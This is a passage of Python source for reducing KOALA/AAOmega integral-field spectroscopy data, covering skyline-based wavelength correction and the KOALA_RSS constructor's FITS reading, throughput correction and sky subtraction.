            sky_lines_file = "sky_lines_rest.dat"
            (
                sl_center,
                sl_name,
                sl_fnl,
                sl_lowlow,
                sl_lowhigh,
                sl_highlow,
                sl_highhigh,
                sl_lmin,
                sl_lmax,
            ) = read_table(
                sky_lines_file, ["f", "s", "f", "f", "f", "f", "f", "f", "f"]
            )
            number_sl = len(sl_center)
            # Fitting Gaussians to skylines...
            say_status = 0
            # NOTE(review): wavelength_offset_per_fibre is initialised but
            # never filled in this method — confirm whether it is still used.
            self.wavelength_offset_per_fibre = []
            wave_median_offset = []
            print("\n> Performing a Gaussian fit to selected, bright skylines... (this will FAIL if RSS is not corrected for CCD defects...)")
            if fibre != 0:
                # Single-fibre mode: restrict the loop and force verbosity.
                f_i = fibre
                f_f = fibre + 1
                print(" Checking fibre {} (only this fibre is corrected, use fibre = 0 for all)...".format(fibre))
                verbose = True
                warnings = True
            else:
                f_i = 0
                f_f = self.n_spectra
                verbose = False
            for fibre in range(f_i, f_f):  # (self.n_spectra):
                spectrum = self.intensity_corrected[fibre]
                # Progress report every 20 fibres.
                if fibre == say_status:
                    print(" Checking fibre {:4} ... ({:6.2f} % completed) ...".format(
                        fibre, fibre * 100.0 / self.n_spectra
                    ))
                    say_status = say_status + 20
                # Gaussian fits to the sky spectrum
                sl_gaussian_flux = []
                sl_gaussian_sigma = []
                sl_gauss_center = []
                sl_offset = []
                sl_offset_good = []
                if verbose:
                    print("\n> Performing Gaussian fitting to bright sky lines in all fibres of rss file...")
                for i in range(number_sl):
                    # sl_fnl flags which individual line fits are plotted.
                    if sl_fnl[i] == 0:
                        plot_fit = False
                    else:
                        plot_fit = True
                    resultado = fluxes(
                        w,
                        spectrum,
                        sl_center[i],
                        lowlow=sl_lowlow[i],
                        lowhigh=sl_lowhigh[i],
                        highlow=sl_highlow[i],
                        highhigh=sl_highhigh[i],
                        lmin=sl_lmin[i],
                        lmax=sl_lmax[i],
                        fmin=0,
                        fmax=0,
                        broad=2.1 * 2.355,
                        plot=plot_fit,
                        verbose=False,
                        plot_sus=False,
                        fcal=False,
                        warnings=warnings,
                    )  # broad is a FWHM (sigma = 1 corresponds to FWHM = 2.355)
                    # resultado indices used here: [1] fitted centre,
                    # [3] Gaussian flux, [5] FWHM (converted to sigma below).
                    sl_gaussian_flux.append(resultado[3])
                    sl_gauss_center.append(resultado[1])
                    sl_gaussian_sigma.append(resultado[5] / 2.355)
                    sl_offset.append(sl_gauss_center[i] - sl_center[i])
                    # Reject bad fits: negative flux, or centre offset /
                    # line width beyond the allowed maxima.
                    if (
                        sl_gaussian_flux[i] < 0
                        or np.abs(sl_center[i] - sl_gauss_center[i]) > maxima_offset
                        or sl_gaussian_sigma[i] > maxima_sigma
                    ):
                        if verbose:
                            print(" Bad fitting for {} ... ignoring this fit...".format(sl_center[i]))
                    else:
                        sl_offset_good.append(sl_offset[i])
                        if verbose:
                            print(" Fitted wavelength for sky line {:8.3f}: center = {:8.3f} sigma = {:6.3f} offset = {:7.3f} ".format(
                                sl_center[i],
                                sl_gauss_center[i],
                                sl_gaussian_sigma[i],
                                sl_offset[i],
                            ))
                # One median offset per fibre, from the accepted line fits.
                median_offset_fibre = np.nanmedian(sl_offset_good)
                wave_median_offset.append(median_offset_fibre)
                if verbose:
                    print("\n> Median offset for fibre {:3} = {:7.3f}".format(
                        fibre, median_offset_fibre
                    ))
            # Second-order fit ...
            # np.polyfit returns highest-order coefficient first.
            xfibre = list(range(0, self.n_spectra))
            a2x, a1x, a0x = np.polyfit(xfibre, wave_median_offset, 2)
            print("\n> Fitting a second-order polynomy a0x + a1x * fibre + a2x * fibre**2:")
        else:
            # Coefficients provided by the caller: skip the fitting stage.
            print("\n> Solution to the second-order polynomy a0x + a1x * fibre + a2x * fibre**2 have been provided:")
            a0x = sol[0]
            a1x = sol[1]
            a2x = sol[2]
            xfibre = list(range(0, self.n_spectra))
        print(" a0x = {} a1x = {} a2x = {}".format(a0x, a1x, a2x))
        self.wavelength_parameters = [a0x, a1x, a2x]  # Save solutions
        # Per-fibre wavelength shift from the polynomial.
        fx = a0x + a1x * np.array(xfibre) + a2x * np.array(xfibre) ** 2
        if plot:
            plt.figure(figsize=(10, 4))
            if sol[0] == 0:
                plt.plot(xfibre, wave_median_offset)
                pf = wave_median_offset
            else:
                pf = fx
            plt.plot(xfibre, fx, "r")
            plot_plot(
                xfibre,
                pf,
                ptitle="Second-order fit to individual offsets",
                xmin=-20,
                xmax=1000,
                xlabel="Fibre",
                ylabel="offset",
            )
        # Applying results
        print("\n> Applying results to all fibres...")
        for fibre in xfibre:
            f = self.intensity_corrected[fibre]
            w_shift = fx[fibre]
            # Shift the spectrum in wavelength by rebinning onto w.
            self.intensity_corrected[fibre] = rebin_spec_shift(w, f, w_shift)
        # Check results
        if plot:
            plt.figure(figsize=(10, 4))
            for i in [0, 300, 600, 950]:
                plt.plot(w, self.intensity[i])
            plot_plot(
                w,
                self.intensity[0],
                ptitle="Before corrections, fibres 0, 300, 600, 950",
                xmin=xmin,
                xmax=xmax,
                ymin=ymin,
                ymax=ymax,
            )
            plt.figure(figsize=(10, 4))
            for i in [0, 300, 600, 950]:
                plt.plot(w, self.intensity_corrected[i])
            plot_plot(
                w,
                self.intensity_corrected[0],
                ptitle="Checking wavelength corrections in fibres 0, 300, 600, 950",
                xmin=xmin,
                xmax=xmax,
                ymin=ymin,
                ymax=ymax,
            )
        print("\n> Small fixing of the 2dFdr wavelengths done!")
        return
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# KOALA_RSS CLASS
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class KOALA_RSS(RSS):
"""
This class reads the FITS files returned by
`2dfdr
<https://aat.anu.edu.au/science/instruments/current/AAOmega/reduction>`_
and performs basic analysis tasks (see description under each method).
Parameters
----------
filename : string
FITS file returned by 2dfdr, containing the Raw Stacked Spectra.
The code makes sure that it contains 1000 spectra
with 2048 wavelengths each.
Example
-------
>>> pointing1 = KOALA_RSS('data/16jan20058red.fits')
> Reading file "data/16jan20058red.fits" ...
2048 wavelength points between 6271.33984375 and 7435.43408203
1000 spaxels
These numbers are the right ones for KOALA!
DONE!
"""
# -----------------------------------------------------------------------------
def __init__(
self,
filename,
save_rss_to_fits_file="",
rss_clean=False, # TASK_KOALA_RSS
apply_throughput=True,
skyflat="",
plot_skyflat=False,
flat="",
nskyflat=True,
correct_ccd_defects=False,
correct_high_cosmics=False,
clip_high=100,
step_ccd=50,
remove_5578=False,
plot_suspicious_fibres=False,
fix_wavelengths=False,
sol=[0, 0, 0],
sky_method="self",
n_sky=50,
sky_fibres=[1000], # do_sky=True
sky_spectrum=[0],
sky_rss=[0],
scale_sky_rss=0,
scale_sky_1D=1.0,
is_sky=False,
win_sky=151,
auto_scale_sky=False,
correct_negative_sky=False,
sky_wave_min=0,
sky_wave_max=0,
cut_sky=5.0,
fmin=1,
fmax=10,
individual_sky_substraction=False,
fibre_list=[100, 200, 300, 400, 500, 600, 700, 800, 900],
do_extinction=True,
telluric_correction=[0],
id_el=False,
high_fibres=10,
brightest_line="Ha",
cut=1.5,
broad=1.0,
plot_id_el=False,
id_list=[0],
brightest_line_wavelength=0,
clean_sky_residuals=False,
dclip=3.0,
extra_w=1.3,
step_csr=25,
fibre=0,
valid_wave_min=0,
valid_wave_max=0,
warnings=True,
verbose=False,
plot=True,
norm=colors.LogNorm(),
fig_size=12,
):
"""
Parameters
----------
filename
save_rss_to_fits_file
rss_clean
apply_throughput
skyflat
plot_skyflat
flat
nskyflat
correct_ccd_defects
correct_high_cosmics
clip_high
step_ccd
remove_5578
plot_suspicious_fibres
fix_wavelengths
sol
sky_method
n_sky
sky_fibres
sky_spectrum
sky_rss
scale_sky_rss
scale_sky_1D
is_sky
win_sky
auto_scale_sky
correct_negative_sky
sky_wave_min
sky_wave_max
cut_sky
fmin
fmax
individual_sky_substraction
fibre_list
do_extinction
telluric_correction
id_el
high_fibres
brightest_line
cut
broad
plot_id_el
id_list
brightest_line_wavelength
clean_sky_residuals
dclip
extra_w
step_csr
fibre
valid_wave_min
valid_wave_max
warnings
verbose
plot
norm
fig_size
"""
# Just read file if rss_clean = True
if rss_clean:
apply_throughput = False
correct_ccd_defects = False
fix_wavelengths = False
sol = [0, 0, 0]
sky_method = "none"
do_extinction = False
telluric_correction = [0]
id_el = False
clean_sky_residuals = False
plot = False
correct_negative_sky = False
# Create RSS object
super(KOALA_RSS, self).__init__()
print("\n> Reading file", '"' + filename + '"', "...")
RSS_fits_file = fits.open(filename) # Open file
self.rss_list = []
# General info:
self.object = RSS_fits_file[FitsExt.main].header["OBJECT"]
self.description = self.object + " - " + filename
self.RA_centre_deg = RSS_fits_file[FitsExt.fibres_ifu].header["CENRA"] * 180/np.pi
self.DEC_centre_deg = RSS_fits_file[FitsExt.fibres_ifu].header["CENDEC"] * 180/np.pi
self.exptime = RSS_fits_file[FitsExt.main].header["EXPOSED"]
# WARNING: Something is probably wrong/inaccurate here!
# Nominal offsets between pointings are totally wrong!
# Read good/bad spaxels
all_spaxels = list(range(len(RSS_fits_file[FitsExt.fibres_ifu].data)))
quality_flag = [RSS_fits_file[FitsExt.fibres_ifu].data[i][FitsFibresIFUIndex.quality_flag] for i in all_spaxels]
good_spaxels = [i for i in all_spaxels if quality_flag[i] == 1]
bad_spaxels = [i for i in all_spaxels if quality_flag[i] == 0]
# for i in range(1):
# print i, RSS_fits_file[2]
#
# Create wavelength, intensity, and variance arrays only for good spaxels
wcsKOALA = WCS(RSS_fits_file[FitsExt.main].header)
# variance = RSS_fits_file[1].data[good_spaxels]
index_wave = np.arange(RSS_fits_file[FitsExt.main].header["NAXIS1"])
wavelength = wcsKOALA.dropaxis(1).wcs_pix2world(index_wave, 0)[0]
intensity = RSS_fits_file[FitsExt.main].data[good_spaxels]
print("\n Number of spectra in this RSS = {}, number of good spectra = {} , number of bad spectra ={}".format(
len(RSS_fits_file[FitsExt.main].data), len(good_spaxels), len(bad_spaxels)))
print(" Bad fibres = {}".format(bad_spaxels))
# Read errors using RSS_fits_file[1]
# self.header1 = RSS_fits_file[1].data # CHECK WHEN DOING ERRORS !!!
# Read spaxel positions on sky using RSS_fits_file[2]
self.header2_data = RSS_fits_file[FitsExt.fibres_ifu].data
# CAREFUL !! header 2 has the info of BAD fibres, if we are reading from our created RSS files we have to do it in a different way...
# print RSS_fits_file[2].data
if len(bad_spaxels) == 0:
offset_RA_arcsec_ = []
offset_DEC_arcsec_ = []
for i in range(len(good_spaxels)):
offset_RA_arcsec_.append(self.header2_data[i][FitsFibresIFUIndex.ra_offset])
offset_DEC_arcsec_.append(self.header2_data[i][FitsFibresIFUIndex.dec_offset])
offset_RA_arcsec = np.array(offset_RA_arcsec_)
offset_DEC_arcsec = np.array(offset_DEC_arcsec_)
variance = np.zeros_like(intensity) # CHECK FOR ERRORS
else:
offset_RA_arcsec = np.array(
[RSS_fits_file[FitsExt.fibres_ifu].data[i][FitsFibresIFUIndex.ra_offset] for i in good_spaxels]
)
offset_DEC_arcsec = np.array(
[RSS_fits_file[FitsExt.fibres_ifu].data[i][FitsFibresIFUIndex.dec_offset] for i in good_spaxels]
)
self.ID = np.array(
[RSS_fits_file[FitsExt.fibres_ifu].data[i][FitsFibresIFUIndex.spec_id] for i in good_spaxels]
) # These are the good fibres
variance = RSS_fits_file[FitsExt.var].data[good_spaxels] # CHECK FOR ERRORS
self.ZDSTART = RSS_fits_file[FitsExt.main].header["ZDSTART"] # Zenith distance (degrees?)
self.ZDEND = RSS_fits_file[FitsExt.main].header["ZDEND"]
# KOALA-specific stuff
self.PA = RSS_fits_file[FitsExt.main].header["TEL_PA"] # Position angle?
self.grating = RSS_fits_file[FitsExt.main].header["GRATID"]
# Check RED / BLUE arm for AAOmega
if RSS_fits_file[FitsExt.main].header["SPECTID"] == "RD":
AAOmega_Arm = "RED"
if RSS_fits_file[FitsExt.main].header["SPECTID"] == "BL":
AAOmega_Arm = "BLUE"
# For WCS
self.CRVAL1_CDELT1_CRPIX1 = []
self.CRVAL1_CDELT1_CRPIX1.append(RSS_fits_file[FitsExt.main].header["CRVAL1"]) # see https://idlastro.gsfc.nasa.gov/ftp/pro/astrom/aaareadme.txt maybe?
self.CRVAL1_CDELT1_CRPIX1.append(RSS_fits_file[FitsExt.main].header["CDELT1"])
self.CRVAL1_CDELT1_CRPIX1.append(RSS_fits_file[FitsExt.main].header["CRPIX1"])
# SET RSS
# FROM HERE IT WAS self.set_data before ------------------------------------------
self.wavelength = wavelength
self.n_wave = len(wavelength)
# Check that dimensions match KOALA numbers
if self.n_wave != 2048 and len(all_spaxels) != 1000:
print("\n *** WARNING *** : These numbers are NOT the standard ones for KOALA")
print("\n> Setting the data for this file:")
if variance.shape != intensity.shape:
print("\n* ERROR: * the intensity and variance matrices are {} and {} respectively\n".format(intensity.shape, variance.shape))
raise ValueError
n_dim = len(intensity.shape)
if n_dim == 2:
self.intensity = intensity
self.variance = variance
elif n_dim == 1:
self.intensity = intensity.reshape((1, self.n_wave))
self.variance = variance.reshape((1, self.n_wave))
else:
print("\n* ERROR: * the intensity matrix supplied has {} dimensions\n".format(n_dim))
raise ValueError
self.n_spectra = self.intensity.shape[0]
self.n_wave = len(self.wavelength)
print(" Found {} spectra with {} wavelengths".format(
self.n_spectra, self.n_wave
), "between {:.2f} and {:.2f} Angstrom".format(
self.wavelength[0], self.wavelength[-1]
))
if self.intensity.shape[1] != self.n_wave:
print("\n* ERROR: * spectra have {} wavelengths rather than {}".format(self.intensity.shape[1], self.n_wave))
raise ValueError
if (
len(offset_RA_arcsec) != self.n_spectra
or len(offset_DEC_arcsec) != self.n_spectra
):
print("\n* ERROR: * offsets (RA, DEC) = ({},{}) rather than {}".format(
len(self.offset_RA_arcsec), len(self.offset_DEC_arcsec), self.n_spectra
)
)
raise ValueError
else:
self.offset_RA_arcsec = offset_RA_arcsec
self.offset_DEC_arcsec = offset_DEC_arcsec
# Check if NARROW (spaxel_size = 0.7 arcsec)
# or WIDE (spaxel_size=1.25) field of view
# (if offset_max - offset_min > 31 arcsec in both directions)
if (
np.max(offset_RA_arcsec) - np.min(offset_RA_arcsec) > 31
or np.max(offset_DEC_arcsec) - np.min(offset_DEC_arcsec) > 31
):
self.spaxel_size = 1.25
field = "WIDE"
else:
self.spaxel_size = 0.7
field = "NARROW"
# Get min and max for rss
self.RA_min, self.RA_max, self.DEC_min, self.DEC_max = coord_range([self])
self.DEC_segment = (
self.DEC_max - self.DEC_min
) * 3600.0 # +1.25 for converting to total field of view
self.RA_segment = (self.RA_max - self.RA_min) * 3600.0 # +1.25
# UPDATE THIS TO BE VALID TO ALL GRATINGS!
# ALSO CONSIDER WAVELENGTH RANGE FOR SKYFLATS AND OBJECTS
if valid_wave_min == 0 and valid_wave_max == 0:
self.valid_wave_min = np.min(self.wavelength)
self.valid_wave_max = np.max(self.wavelength)
# if self.grating == "1000R":
# self.valid_wave_min = 6600. # CHECK ALL OF THIS...
# self.valid_wave_max = 6800.
# print " For 1000R, we use the [6200, 7400] range."
# if self.grating == "1500V":
# self.valid_wave_min = np.min(self.wavelength)
# self.valid_wave_max = np.max(self.wavelength)
# print " For 1500V, we use all the range."
# if self.grating == "580V":
# self.valid_wave_min = 3650.
# self.valid_wave_max = 5700.
# print " For 580V, we use the [3650, 5700] range."
# if self.grating == "1500V":
# self.valid_wave_min = 4620. #4550
# self.valid_wave_max = 5350. #5350
# print " For 1500V, we use the [4550, 5350] range."
else:
self.valid_wave_min = valid_wave_min
self.valid_wave_max = valid_wave_max
print(" As specified, we use the [ {} , {} ] range.".format(self.valid_wave_min, self.valid_wave_max))
# Plot RSS_image
if plot:
self.RSS_image(image=self.intensity, cmap="binary_r")
# Deep copy of intensity into intensity_corrected
self.intensity_corrected = copy.deepcopy(self.intensity)
# Divide by flatfield if needed
if flat != "":
print("\n> Dividing the data by the flatfield provided...")
self.intensity_corrected = (self.intensity_corrected/flat.intensity_corrected) # todo: check division per pixel works.
# Check if apply relative throughput & apply it if requested
if apply_throughput:
if plot_skyflat:
plt.figure(figsize=(10, 4))
for i in range(self.n_spectra):
plt.plot(self.wavelength, self.intensity[i, ])
plt.ylim(0, 200 * np.nanmedian(self.intensity))
plt.minorticks_on()
plt.xlabel("Wavelength [$\AA$]")
plt.title("Spectra WITHOUT CONSIDERING throughput correction")
# plt.show()
# plt.close()
print("\n> Applying relative throughput correction using median skyflat values per fibre...")
self.relative_throughput = skyflat.relative_throughput
self.response_sky_spectrum = skyflat.response_sky_spectrum
for i in range(self.n_spectra):
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :]/self.relative_throughput[i]
)
if nskyflat:
print("\n IMPORTANT: We are dividing intensity data by the sky.response_sky_spectrum !!! ")
print(" This is kind of a flat, the changes are between {} and {}".format(
np.nanmin(skyflat.response_sky_spectrum), np.nanmax(skyflat.response_sky_spectrum)))
print(" ")
self.intensity_corrected = (
self.intensity_corrected/self.response_sky_spectrum
)
if plot_skyflat:
plt.figure(figsize=(10, 4))
for i in range(self.n_spectra):
plt.plot(self.wavelength, self.intensity_corrected[i, ])
plt.ylim(0, 200 * np.nanmedian(self.intensity_corrected))
plt.minorticks_on()
plt.xlabel("Wavelength [$\AA$]")
plt.title("Spectra CONSIDERING throughput correction (median value per fibre)")
# plt.show()
# plt.close()
print(" Intensities corrected for relative throughput stored in self.intensity_corrected !")
text_for_integrated_fibre = "after throughput correction..."
title_for_integrated_fibre = " - Throughput corrected"
else:
if rss_clean == False:
print("\n> Intensities NOT corrected for relative throughput")
self.relative_throughput = np.ones(self.n_spectra)
text_for_integrated_fibre = "..."
title_for_integrated_fibre = ""
# Compute integrated map after throughput correction & plot if requested
self.compute_integrated_fibre(
plot=plot,
title=title_for_integrated_fibre,
text=text_for_integrated_fibre,
warnings=warnings,
correct_negative_sky=correct_negative_sky,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
)
plot_integrated_fibre_again = 0 # Check if we need to plot it again
# Compare corrected vs uncorrected spectrum
# self.plot_corrected_vs_uncorrected_spectrum(high_fibres=high_fibres, fig_size=fig_size)
# Cleaning high cosmics and defects
if sky_method == "1D" or sky_method == "2D":
# If not it will not work when applying scale for sky substraction...
remove_5578 = False
if correct_ccd_defects:
if plot:
plot_integrated_fibre_again = plot_integrated_fibre_again + 1
self.correct_high_cosmics_and_defects(
correct_high_cosmics=correct_high_cosmics,
step=step_ccd,
remove_5578=remove_5578,
clip_high=clip_high,
plot_suspicious_fibres=plot_suspicious_fibres,
warnings=warnings,
verbose=verbose,
plot=plot,
)
# Compare corrected vs uncorrected spectrum
if plot:
self.plot_corrected_vs_uncorrected_spectrum(
high_fibres=high_fibres, fig_size=fig_size
)
# Fixing small wavelengths
if sol[0] != 0:
self.fix_2dfdr_wavelengths(sol=sol)
else:
if fix_wavelengths:
self.fix_2dfdr_wavelengths()
# else:
# print "\n> We don't fix 2dfdr wavelengths on this rss."
# SKY SUBSTRACTION sky_method
#
# Several options here: (1) "1D" : Consider a single sky spectrum, scale it and substract it
# (2) "2D" : Consider a 2D sky. i.e., a sky image, scale it and substract it fibre by fibre
# (3) "self" : Obtain the sky spectrum using the n_sky lowest fibres in the RSS file (DEFAULT)
# (4) "none" : None sky substraction is performed
# (5) "1Dfit": Using an external 1D sky spectrum, fits sky lines in both sky spectrum AND all the fibres
if sky_method != "none" and is_sky == False:
plot_integrated_fibre_again = plot_integrated_fibre_again + 1
# (5)
if sky_method == "1Dfit":
print("\n> Fitting sky lines in both a provided sky spectrum AND all the fibres")
print(" This process takes ~20 minutes for 385R!\n")
if scale_sky_1D != 0:
print(" Sky spectrum scaled by {}".format(scale_sky_1D))
sky = np.array(sky_spectrum) * scale_sky_1D
print(" Sky spectrum provided = {}".format(sky))
self.sky_emission = sky
self.fit_and_substract_sky_spectrum(
sky,
brightest_line_wavelength=brightest_line_wavelength,
brightest_line=brightest_line,
maxima_sigma=3.0,
ymin=-50,
ymax=1000,
wmin=0,
wmax=0,
auto_scale_sky=auto_scale_sky,
warnings=False,
verbose=False,
plot=False,
fig_size=12,
fibre=fibre,
)
# (1) If a single sky_spectrum is provided:
if sky_method == "1D":
if sky_spectrum[0] != 0:
print("\n> Sustracting the sky using the sky spectrum provided, checking the scale OBJ/SKY...")
if scale_sky_1D == 0:
self.sky_emission = scale_sky_spectrum(
self.wavelength,
sky_spectrum,
self.intensity_corrected,
cut_sky=cut_sky,
fmax=fmax,
fmin=fmin,
fibre_list=fibre_list,
)
else:
self.sky_emission = sky_spectrum * scale_sky_1D
print(" As requested, we scale the given 1D spectrum by {}".format(scale_sky_1D))
if individual_sky_substraction:
print("\n As requested, performing individual sky substraction in each fibre...")
else:
print("\n Substracting sky to all fibres using scaled sky spectrum provided...")
# For blue spectra, remove 5578 in the sky spectrum...
if self.valid_wave_min < 5578:
resultado = fluxes(
self.wavelength,
self.sky_emission,
5578,
plot=False,
verbose=False,
) # fmin=-5.0E-17, fmax=2.0E-16,
# resultado = [rms_cont, fit[0], fit_error[0], gaussian_flux, gaussian_flux_error, fwhm, fwhm_error, flux, flux_error, ew, ew_error, spectrum ]
self.sky_emission = resultado[11]
for i in range(self.n_spectra):
# Clean 5578 if needed in RSS data
if self.valid_wave_min < 5578:
resultado = fluxes(
self.wavelength,
self.intensity_corrected[i],
5578,
plot=False,
verbose=False,
) # fmin=-5.0E-17, fmax=2.0E-16,
# resultado = [rms_cont, fit[0], fit_error[0], gaussian_flux, gaussian_flux_error, fwhm, fwhm_error, flux, flux_error, ew, ew_error, spectrum ]
self.intensity_corrected[i] = resultado[11]
if individual_sky_substraction:
# Do this INDIVIDUALLY for each fibre
if i == 100:
print(" Substracting sky in fibre 100...")
if i == 200:
print(" Substracting sky in fibre 200...")
if i == 300:
print(" Substracting sky in fibre 300...")
if i == 400:
print(" Substracting sky in fibre 400...")
if i == 500:
print(" Substracting sky in fibre 500...")
if i == 600:
print(" Substracting sky in fibre 600...")
if i == 700:
print(" Substracting sky in fibre 700...")
if i == 800:
print(" Substracting sky in fibre 800...")
if i == 900:
print(" Substracting sky in fibre 900...")
sky_emission = scale_sky_spectrum(
self.wavelength,
sky_spectrum,
self.intensity_corrected,
cut_sky=cut_sky,
fmax=fmax,
fmin=fmin,
fibre_list=[i],
verbose=False,
plot=False,
warnings=False,
)
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :] - sky_emission
) # sky_spectrum * self.exptime/sky_exptime
else:
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :] - self.sky_emission
) # sky_spectrum * self.exptime/sky_exptime
if plot:
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(self.wavelength, sky_spectrum)
plt.minorticks_on()
plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.title("Sky spectrum provided (Scaled)")
plt.xlabel("Wavelength [$\AA$]")
# plt.show()
# plt.close()
print(" Intensities corrected for sky emission and stored in self.intensity_corrected !")
self.sky_emission = sky_spectrum
else:
print("\n> Sustracting the sky using the sky spectrum requested but any sky spectrum provided !")
sky_method = "self"
n_sky = 50
# (2) If a 2D sky, sky_rss, is provided
if sky_method == "2D": # if np.nanmedian(sky_rss.intensity_corrected) != 0:
if scale_sky_rss != 0:
print("\n> Using sky image provided to substract sky, considering a scale of", scale_sky_rss, "...")
self.sky_emission = scale_sky_rss * sky_rss.intensity_corrected
self.intensity_corrected = (
self.intensity_corrected - self.sky_emission
)
else:
print("\n> Using sky image provided to substract sky, computing the scale using sky lines")
# check scale fibre by fibre
self.sky_emission = copy.deepcopy(sky_rss.intensity_corrected)
scale_per_fibre = np.ones((self.n_spectra))
scale_per_fibre_2 = np.ones((self.n_spectra))
lowlow = 15
lowhigh = 5
highlow = 5
highhigh = 15
if self.grating == "580V":
print(" For 580V we use bright skyline at 5578 AA ...")
sky_line = 5578
sky_line_2 = 0
if self.grating == "1000R":
# print " For 1000R we use skylines at 6300.5 and 6949.0 AA ..." ### TWO LINES GIVE WORSE RESULTS THAN USING ONLY 1...
print(" For 1000R we use skyline at 6949.0 AA ...")
sky_line = 6949.0 # 6300.5
lowlow = 22 # for getting a good continuuem in 6949.0
lowhigh = 12
highlow = 36
highhigh = 52
sky_line_2 = 0 # 6949.0 #7276.5 fails
lowlow_2 = 22 # for getting a good continuuem in 6949.0
lowhigh_2 = 12
highlow_2 = 36
highhigh_2 = 52
if sky_line_2 != 0:
print(" ... first checking {} ...".format(sky_line))
for fibre_sky in range(self.n_spectra):
skyline_spec = fluxes(
self.wavelength,
self.intensity_corrected[fibre_sky],
sky_line,
plot=False,
verbose=False,
lowlow=lowlow,
lowhigh=lowhigh,
highlow=highlow,
highhigh=highhigh,
) # fmin=-5.0E-17, fmax=2.0E-16,
# resultado = [rms_cont, fit[0], fit_error[0], gaussian_flux, gaussian_flux_error, fwhm, fwhm_error, flux, flux_error, ew, ew_error, spectrum ]
self.intensity_corrected[fibre_sky] = skyline_spec[11]
skyline_sky = fluxes(
self.wavelength,
self.sky_emission[fibre_sky],
sky_line,
plot=False,
verbose=False,
lowlow=lowlow,
lowhigh=lowhigh,
highlow=highlow,
highhigh=highhigh,
) # fmin=-5.0E-17, fmax=2.0E-16,
scale_per_fibre[fibre_sky] = old_div(skyline_spec[3], skyline_sky[3]) # TODO: get data for 2D and test if can remove
self.sky_emission[fibre_sky] = skyline_sky[11]
if sky_line_2 != 0:
print(" ... now checking {} ...".format(sky_line_2))
for fibre_sky in range(self.n_spectra):
skyline_spec = fluxes(
self.wavelength,
self.intensity_corrected[fibre_sky],
sky_line_2,
plot=False,
verbose=False,
lowlow=lowlow_2,
lowhigh=lowhigh_2,
highlow=highlow_2,
highhigh=highhigh_2,
) # fmin=-5.0E-17, fmax=2.0E-16,
# resultado = [rms_cont, fit[0], fit_error[0], gaussian_flux, gaussian_flux_error, fwhm, fwhm_error, flux, flux_error, ew, ew_error, spectrum ]
self.intensity_corrected[fibre_sky] = skyline_spec[11]
skyline_sky = fluxes(
self.wavelength,
self.sky_emission[fibre_sky],
sky_line_2,
plot=False,
verbose=False,
lowlow=lowlow_2,
lowhigh=lowhigh_2,
highlow=highlow_2,
highhigh=highhigh_2,
) # fmin=-5.0E-17, fmax=2.0E-16,
scale_per_fibre_2[fibre_sky] = (
old_div(skyline_spec[3], skyline_sky[3]) # TODO: get data for 2D and test if can remove
)
self.sky_emission[fibre_sky] = skyline_sky[11]
# Median value of scale_per_fibre, and apply that value to all fibres
if sky_line_2 == 0:
scale_sky_rss = np.nanmedian(scale_per_fibre)
self.sky_emission = self.sky_emission * scale_sky_rss
else:
scale_sky_rss = np.nanmedian(
old_div((scale_per_fibre + scale_per_fibre_2), 2) # TODO: get data for 2D and test if can remove
)
# Make linear fit
scale_sky_rss_1 = np.nanmedian(scale_per_fibre)
scale_sky_rss_2 = np.nanmedian(scale_per_fibre_2)
print(
" Median scale for line 1 : {} range [ {}, {} ]]".format(
scale_sky_rss_1, np.nanmin(scale_per_fibre), np.nanmax(scale_per_fibre)
)
)
print(
" Median scale for line 2 : {} range [ {}, {} ]]".format(
scale_sky_rss_2, np.nanmin(scale_per_fibre_2), np.nanmax(scale_per_fibre_2)
)
)
b = old_div((scale_sky_rss_1 - scale_sky_rss_2), (
sky_line - sky_line_2 # TODO: get data for 2D and test if can remove
))
a = scale_sky_rss_1 - b * sky_line
# ,a+b*sky_line,a+b*sky_line_2
print(" Appling linear fit with a = {} b = {} to all fibres in sky image...".format(a, b))
for i in range(self.n_wave):
self.sky_emission[:, i] = self.sky_emission[:, i] * (
a + b * self.wavelength[i]
)
if plot:
plt.figure(figsize=(fig_size, fig_size / 2.5))
label1 = "$\lambda$" + np.str(sky_line)
plt.plot(scale_per_fibre, alpha=0.5, label=label1)
plt.minorticks_on()
plt.ylim(np.nanmin(scale_per_fibre), np.nanmax(scale_per_fibre))
plt.axhline(y=scale_sky_rss, color="k", linestyle="--")
if sky_line_2 == 0:
text = (
"Scale OBJECT / SKY using sky line $\lambda$ {}".format(sky_line))
print(" Scale per fibre in the range [{} , {} ], median value is {}".format(np.nanmin(scale_per_fibre), np.nanmax(scale_per_fibre), scale_sky_rss))
print(" Using median value to scale sky emission provided...")
if sky_line_2 != 0:
text = (
"Scale OBJECT / SKY using sky lines $\lambda$ {} and $\lambda$".format(sky_line, sky_line_2))
label2 = "$\lambda$ {}".format(sky_line_2)
plt.plot(scale_per_fibre_2, alpha=0.5, label=label2)
plt.axhline(y=scale_sky_rss_1, color="k", linestyle=":")
plt.axhline(y=scale_sky_rss_2, color="k", linestyle=":")
plt.legend(frameon=False, loc=1, ncol=2)
plt.title(text)
plt.xlabel("Fibre")
# plt.show()
# plt.close()
self.intensity_corrected = (
self.intensity_corrected - self.sky_emission
)
# (3) No sky spectrum or image is provided, obtain the sky using the n_sky lowest fibres
if sky_method == "self":
print("\n Using {} lowest intensity fibres to create a sky...".format(n_sky))
self.find_sky_emission(
n_sky=n_sky,
plot=plot,
sky_fibres=sky_fibres,
sky_wave_min=sky_wave_min,
sky_wave_max=sky_wave_max,
)
# print "\n AFTER SKY SUBSTRACTION:"
